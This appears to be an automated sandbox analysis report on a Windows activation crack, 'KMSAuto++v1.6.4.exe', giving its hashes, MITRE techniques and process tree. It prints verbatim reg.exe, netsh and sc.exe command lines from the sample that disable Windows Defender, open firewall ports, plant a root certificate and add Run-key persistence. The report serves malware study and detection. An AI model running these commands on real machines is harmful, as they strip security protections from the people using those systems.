a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520

Analysis

max time kernel
106s
max time network
124s
platform
windows7_x64
resource
win7-20221111-es
resource tags

arch:x64arch:x86image:win7-20221111-eslocale:es-esos:windows7-x64systemwindows
submitted
06-02-2023 17:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KMSAuto++v1.6.4.exe
Size

718.9MB
MD5

ef8cd375fdc780a87dbf601860994ab9
SHA1

b0aac6fb4006091219ba82a5838e810e0e27beba
SHA256

a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520
SHA512

52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417
SSDEEP

786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2

Score

10^/10

evasion persistence trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Modifies Windows Firewall 1 TTPs 10 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

1516 netsh.exe
1916 netsh.exe
844 netsh.exe
652 netsh.exe
480 netsh.exe
1336 netsh.exe
1760 netsh.exe
1308 netsh.exe
896 netsh.exe
1156 netsh.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

pid	process
1516	netsh.exe
1916	netsh.exe
844	netsh.exe
652	netsh.exe
480	netsh.exe
1336	netsh.exe
1760	netsh.exe
1308	netsh.exe
896	netsh.exe
1156	netsh.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

kmsauto++v1.6.4.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\KMSEmulator\ImagePath = "\"C:\\Users\\Admin\\KMSAuto_Files\\bin\\KMSSS.exe\" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP"	kmsauto++v1.6.4.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 7 IoCs

Processes:

kms driver.exekmsauto++v1.6.4.exemicrosoft tap driver.exesvchost32.exesigntool.exeKMSSS.exeKMSSS.exe

pid process

1880 kms driver.exe
520 kmsauto++v1.6.4.exe
1596 microsoft tap driver.exe
1816 svchost32.exe
1652 signtool.exe
1904 KMSSS.exe
896 KMSSS.exe

pid	process
1880	kms driver.exe
520	kmsauto++v1.6.4.exe
1596	microsoft tap driver.exe
1816	svchost32.exe
1652	signtool.exe
1904	KMSSS.exe
896	KMSSS.exe

Loads dropped DLL 18 IoCs

Processes:

KMSAuto++v1.6.4.exekmsauto++v1.6.4.exe

pid	process
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
1984	KMSAuto++v1.6.4.exe
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\kmsauto++v1.6.4.exe	upx
\Users\Admin\kmsauto++v1.6.4.exe	upx
C:\Users\Admin\kmsauto++v1.6.4.exe	upx
\Users\Admin\kmsauto++v1.6.4.exe	upx
\Users\Admin\kmsauto++v1.6.4.exe	upx
\Users\Admin\microsoft tap driver.exe	upx
\Users\Admin\microsoft tap driver.exe	upx
\Users\Admin\microsoft tap driver.exe	upx
C:\Users\Admin\microsoft tap driver.exe	upx
behavioral1/memory/520-90-0x0000000000400000-0x0000000001713000-memory.dmp	upx
behavioral1/memory/1596-93-0x0000000000400000-0x000000000041F000-memory.dmp	upx
C:\Users\Admin\kmsauto++v1.6.4.exe	upx
behavioral1/memory/520-134-0x0000000000400000-0x0000000001713000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

svchost32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	svchost32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchost32.exe = "C:\\Users\\Admin\\svchost32.exe"	svchost32.exe

Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

980 sc.exe
1048 sc.exe
1380 sc.exe
1880 sc.exe
2012 sc.exe
1244 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1516 1880 WerFault.exe kms driver.exe

pid	process
980	sc.exe
1048	sc.exe
1380	sc.exe
1880	sc.exe
2012	sc.exe
1244	sc.exe

pid	pid_target	process	target process
1516	1880	WerFault.exe	kms driver.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

signtool.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	signtool.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	signtool.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

svchost32.exe

pid process

1816 svchost32.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

kmsauto++v1.6.4.exe

pid process

520 kmsauto++v1.6.4.exe
520 kmsauto++v1.6.4.exe
520 kmsauto++v1.6.4.exe
520 kmsauto++v1.6.4.exe

pid	process
1816	svchost32.exe

pid	process
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exewmic.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1416	wmic.exe
Token: SeSecurityPrivilege	1416	wmic.exe
Token: SeTakeOwnershipPrivilege	1416	wmic.exe
Token: SeLoadDriverPrivilege	1416	wmic.exe
Token: SeSystemProfilePrivilege	1416	wmic.exe
Token: SeSystemtimePrivilege	1416	wmic.exe
Token: SeProfSingleProcessPrivilege	1416	wmic.exe
Token: SeIncBasePriorityPrivilege	1416	wmic.exe
Token: SeCreatePagefilePrivilege	1416	wmic.exe
Token: SeBackupPrivilege	1416	wmic.exe
Token: SeRestorePrivilege	1416	wmic.exe
Token: SeShutdownPrivilege	1416	wmic.exe
Token: SeDebugPrivilege	1416	wmic.exe
Token: SeSystemEnvironmentPrivilege	1416	wmic.exe
Token: SeRemoteShutdownPrivilege	1416	wmic.exe
Token: SeUndockPrivilege	1416	wmic.exe
Token: SeManageVolumePrivilege	1416	wmic.exe
Token: 33	1416	wmic.exe
Token: 34	1416	wmic.exe
Token: 35	1416	wmic.exe
Token: SeIncreaseQuotaPrivilege	1416	wmic.exe
Token: SeSecurityPrivilege	1416	wmic.exe
Token: SeTakeOwnershipPrivilege	1416	wmic.exe
Token: SeLoadDriverPrivilege	1416	wmic.exe
Token: SeSystemProfilePrivilege	1416	wmic.exe
Token: SeSystemtimePrivilege	1416	wmic.exe
Token: SeProfSingleProcessPrivilege	1416	wmic.exe
Token: SeIncBasePriorityPrivilege	1416	wmic.exe
Token: SeCreatePagefilePrivilege	1416	wmic.exe
Token: SeBackupPrivilege	1416	wmic.exe
Token: SeRestorePrivilege	1416	wmic.exe
Token: SeShutdownPrivilege	1416	wmic.exe
Token: SeDebugPrivilege	1416	wmic.exe
Token: SeSystemEnvironmentPrivilege	1416	wmic.exe
Token: SeRemoteShutdownPrivilege	1416	wmic.exe
Token: SeUndockPrivilege	1416	wmic.exe
Token: SeManageVolumePrivilege	1416	wmic.exe
Token: 33	1416	wmic.exe
Token: 34	1416	wmic.exe
Token: 35	1416	wmic.exe
Token: SeIncreaseQuotaPrivilege	1808	wmic.exe
Token: SeSecurityPrivilege	1808	wmic.exe
Token: SeTakeOwnershipPrivilege	1808	wmic.exe
Token: SeLoadDriverPrivilege	1808	wmic.exe
Token: SeSystemProfilePrivilege	1808	wmic.exe
Token: SeSystemtimePrivilege	1808	wmic.exe
Token: SeProfSingleProcessPrivilege	1808	wmic.exe
Token: SeIncBasePriorityPrivilege	1808	wmic.exe
Token: SeCreatePagefilePrivilege	1808	wmic.exe
Token: SeBackupPrivilege	1808	wmic.exe
Token: SeRestorePrivilege	1808	wmic.exe
Token: SeShutdownPrivilege	1808	wmic.exe
Token: SeDebugPrivilege	1808	wmic.exe
Token: SeSystemEnvironmentPrivilege	1808	wmic.exe
Token: SeRemoteShutdownPrivilege	1808	wmic.exe
Token: SeUndockPrivilege	1808	wmic.exe
Token: SeManageVolumePrivilege	1808	wmic.exe
Token: 33	1808	wmic.exe
Token: 34	1808	wmic.exe
Token: 35	1808	wmic.exe
Token: SeIncreaseQuotaPrivilege	1808	wmic.exe
Token: SeSecurityPrivilege	1808	wmic.exe
Token: SeTakeOwnershipPrivilege	1808	wmic.exe
Token: SeLoadDriverPrivilege	1808	wmic.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

kmsauto++v1.6.4.exe

pid process

520 kmsauto++v1.6.4.exe
520 kmsauto++v1.6.4.exe
520 kmsauto++v1.6.4.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

kmsauto++v1.6.4.exe

pid process

520 kmsauto++v1.6.4.exe
520 kmsauto++v1.6.4.exe
520 kmsauto++v1.6.4.exe

pid	process
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe

pid	process
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe
520	kmsauto++v1.6.4.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

KMSAuto++v1.6.4.exemicrosoft tap driver.execmd.exekmsauto++v1.6.4.exe

description	pid	process	target process
PID 1984 wrote to memory of 1880	1984	KMSAuto++v1.6.4.exe	kms driver.exe
PID 1984 wrote to memory of 1880	1984	KMSAuto++v1.6.4.exe	kms driver.exe
PID 1984 wrote to memory of 1880	1984	KMSAuto++v1.6.4.exe	kms driver.exe
PID 1984 wrote to memory of 1880	1984	KMSAuto++v1.6.4.exe	kms driver.exe
PID 1984 wrote to memory of 520	1984	KMSAuto++v1.6.4.exe	kmsauto++v1.6.4.exe
PID 1984 wrote to memory of 520	1984	KMSAuto++v1.6.4.exe	kmsauto++v1.6.4.exe
PID 1984 wrote to memory of 520	1984	KMSAuto++v1.6.4.exe	kmsauto++v1.6.4.exe
PID 1984 wrote to memory of 520	1984	KMSAuto++v1.6.4.exe	kmsauto++v1.6.4.exe
PID 1984 wrote to memory of 1596	1984	KMSAuto++v1.6.4.exe	microsoft tap driver.exe
PID 1984 wrote to memory of 1596	1984	KMSAuto++v1.6.4.exe	microsoft tap driver.exe
PID 1984 wrote to memory of 1596	1984	KMSAuto++v1.6.4.exe	microsoft tap driver.exe
PID 1984 wrote to memory of 1596	1984	KMSAuto++v1.6.4.exe	microsoft tap driver.exe
PID 1596 wrote to memory of 1736	1596	microsoft tap driver.exe	cmd.exe
PID 1596 wrote to memory of 1736	1596	microsoft tap driver.exe	cmd.exe
PID 1596 wrote to memory of 1736	1596	microsoft tap driver.exe	cmd.exe
PID 1596 wrote to memory of 1736	1596	microsoft tap driver.exe	cmd.exe
PID 1984 wrote to memory of 1816	1984	KMSAuto++v1.6.4.exe	svchost32.exe
PID 1984 wrote to memory of 1816	1984	KMSAuto++v1.6.4.exe	svchost32.exe
PID 1984 wrote to memory of 1816	1984	KMSAuto++v1.6.4.exe	svchost32.exe
PID 1984 wrote to memory of 1816	1984	KMSAuto++v1.6.4.exe	svchost32.exe
PID 1736 wrote to memory of 928	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 928	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 928	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1976	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1976	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1976	1736	cmd.exe	reg.exe
PID 520 wrote to memory of 1144	520	kmsauto++v1.6.4.exe	cmd.exe
PID 520 wrote to memory of 1144	520	kmsauto++v1.6.4.exe	cmd.exe
PID 520 wrote to memory of 1144	520	kmsauto++v1.6.4.exe	cmd.exe
PID 520 wrote to memory of 1144	520	kmsauto++v1.6.4.exe	cmd.exe
PID 1736 wrote to memory of 1020	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1020	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1020	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1428	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1428	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1428	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1924	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1924	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1924	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1156	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1156	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1156	1736	cmd.exe	reg.exe
PID 520 wrote to memory of 1652	520	kmsauto++v1.6.4.exe	signtool.exe
PID 520 wrote to memory of 1652	520	kmsauto++v1.6.4.exe	signtool.exe
PID 520 wrote to memory of 1652	520	kmsauto++v1.6.4.exe	signtool.exe
PID 520 wrote to memory of 1652	520	kmsauto++v1.6.4.exe	signtool.exe
PID 1736 wrote to memory of 1416	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1416	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1416	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 480	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 480	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 480	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1276	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1276	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1276	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 544	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 544	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 544	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 972	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 972	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 972	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 2040	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 2040	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 2040	1736	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe
"C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\kms driver.exe
"C:\Users\Admin\kms driver.exe"
2⤵
- Executes dropped EXE
PID:1880

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1880 -s 584
3⤵
- Program crash
PID:1516

C:\Users\Admin\kmsauto++v1.6.4.exe
"C:\Users\Admin\kmsauto++v1.6.4.exe"
2⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y
3⤵
PID:1144

C:\Users\Admin\AppData\Local\Temp\signtool.exe
"C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1652

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" path Win32_NetworkAdapter get ServiceName /value /FORMAT:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%') get Name, Description, ID, PartialProductKey, LicenseStatus, KeyManagementServiceMachine, KeyManagementServicePort, VLRenewalInterval, GracePeriodRemaining, KeyManagementServicePort, KeyManagementServiceProductKeyID /FORMAT:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" path SoftwareLicensingService get Version /value /FORMAT:List
3⤵
PID:1532

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
3⤵
PID:1908

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
4⤵
- Modifies Windows Firewall
PID:1916

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
3⤵
PID:928

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
4⤵
- Modifies Windows Firewall
PID:844

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
3⤵
PID:1156

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
4⤵
- Modifies Windows Firewall
PID:652

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
3⤵
PID:1516

C:\Windows\system32\netsh.exe
Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
4⤵
- Modifies Windows Firewall
PID:896

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
3⤵
PID:1276

C:\Windows\system32\sc.exe
sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
4⤵
- Launches sc.exe
PID:1048

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator
3⤵
PID:1592

C:\Windows\system32\sc.exe
sc.exe start KMSEmulator
4⤵
- Launches sc.exe
PID:1380

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
3⤵
PID:1632

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
4⤵
PID:984

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
3⤵
PID:1652

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
4⤵
PID:1744

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
3⤵
PID:1316

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
4⤵
PID:776

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
3⤵
PID:1184

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
4⤵
PID:1976

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
3⤵
PID:1896

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
4⤵
PID:636

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
3⤵
PID:1596

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
4⤵
PID:1256

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
3⤵
PID:1620

C:\Windows\System32\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
4⤵
PID:1628

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
3⤵
PID:1088

C:\Windows\System32\reg.exe
